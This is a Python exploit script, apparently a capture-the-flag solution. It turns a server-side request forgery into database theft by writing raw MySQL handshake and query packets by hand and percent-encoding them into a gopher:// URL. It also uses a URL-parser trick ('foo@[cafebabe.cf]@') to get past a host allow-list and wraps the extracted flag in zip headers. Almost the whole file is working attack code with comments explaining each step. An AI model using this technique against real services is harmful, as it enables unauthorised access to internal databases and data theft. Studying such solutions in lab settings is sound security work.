#!/usr/bin/env python3
import struct
import zip_tools
from binascii import hexlify
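# The flag's real length is unknown, so the zip is built around a 100-byte
# placeholder and the query RPADs the flag to the same width with 'A'
# (brute-forcing the length would be the alternative). RPAD truncates
# anything longer than 100 bytes, so widen both if the flag does not fit.
flag_dummy = b"B" * 100
payload = zip_tools.create_zip(b"gimme_flag", flag_dummy)
# Split the archive around the placeholder: the bytes before it (local file
# header) and after it (central directory / end record) are replayed verbatim
# from the SQL side. partition() fails loudly if create_zip did not store the
# placeholder as-is (e.g. compressed it); split()[1] would only raise IndexError.
prefix, marker, suffix = bytes(payload).partition(flag_dummy)
if not marker:
    raise ValueError("placeholder not found verbatim in the zip payload")
# NOTE(review): the size/CRC32 fields in the zip headers still describe the
# placeholder, not the real flag; whatever unpacks the result presumably
# tolerates that - confirm before relying on it.
# Both halves go in as hex literals cast to binary so MySQL returns the raw
# bytes; the trailing `-- -` comments out whatever follows the query in the
# packet (the caller appends padding after the COM_QUERY packet).
sql_cmd = (
    b"select concat(cast(0x" + hexlify(prefix) + b" as binary), "
    b"rpad(flag, 100, 'A'), "
    b"cast(0x" + hexlify(suffix) + b" as binary)) from flag.flag-- -"
)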
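# MySQL HandshakeResponse41 - the client's reply to the server greeting - sent
# blind: the gopher SSRF cannot read the greeting, so the sequence id is
# assumed to be 1. The 3-byte packet length (0x48 in the original) is derived
# from the body so that edits to the user or plugin name cannot desync it.
# The capability flags decode (little-endian) to a set that includes
# PROTOCOL_41, SECURE_CONNECTION, PLUGIN_AUTH and CONNECT_ATTRS, which is
# consistent with the plugin-name field and the trailing zero below.
_auth_body = (
    bytes([0x85, 0xa6, 0x3f, 0x20])      # client capability flags, LE u32
    + bytes([0, 0, 0, 0x1])              # max packet size, LE u32
    + bytes([0x21])                      # character set
    + bytes(23)                          # reserved, must be all zero
    + b'm4st3r_ov3rl0rd' + b'\0'         # mysql user, NUL-terminated
    + b'\0'                              # auth-response length 0: empty password
    + b'mysql_native_password' + b'\0'   # auth plugin name, NUL-terminated
    + b'\0'                              # presumably an empty connect-attrs length
)
auth = bytearray(struct.pack("<I", len(_auth_body))[:3] + bytes([0x1]) + _auth_body)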
def make_cmd(cmd):
    """Wrap a raw SQL query in a MySQL COM_QUERY packet.

    cmd: the query as bytes. Returns a bytearray laid out as a 3-byte
    little-endian length, sequence id 0, the COM_QUERY command byte (0x03)
    and then cmd itself.

    NOTE(review): the protocol's length field covers only the payload
    (command byte + query), i.e. len(cmd) + 1. This uses len(cmd) + 2, so the
    server expects one byte beyond the query; the caller pads the stream and
    the query ends in `-- -`, which is presumably what absorbs it. Left
    unchanged because the working exploit depends on this exact output.
    """
    header = struct.pack("<I", len(cmd) + 2)[:3]
    seq_id = 0x0
    com_query = 0x3
    return bytearray(header) + bytearray([seq_id, com_query]) + cmd
def encode(s):
    """Percent-encode every byte of s (bytes or bytearray) for the gopher URL.

    Unlike urllib's quote(), nothing is left unescaped, so the binary MySQL
    packets reach the socket exactly as built. Returns a str such as "%01%ab".
    """
    return "".join("%" + format(byte, "02x") for byte in s)
# Final SSRF URL. The raw TCP stream smuggled through gopher:// is the blind
# handshake response, the COM_QUERY packet and some padding; the "A" after the
# path slash is a throwaway byte (presumably the gopher item-type selector the
# client strips). The "foo@[cafebabe.cf]@" part of the authority looks like a
# URL-parser differential to satisfy a host allow-list - verify against the
# target's validator before reuse.
raw_stream = auth + make_cmd(sql_cmd) + b"FOOOOOOOOOOOOBAR"
url = "gopher://foo@[cafebabe.cf]@yolo.com:3306/A" + encode(raw_stream)
print(url)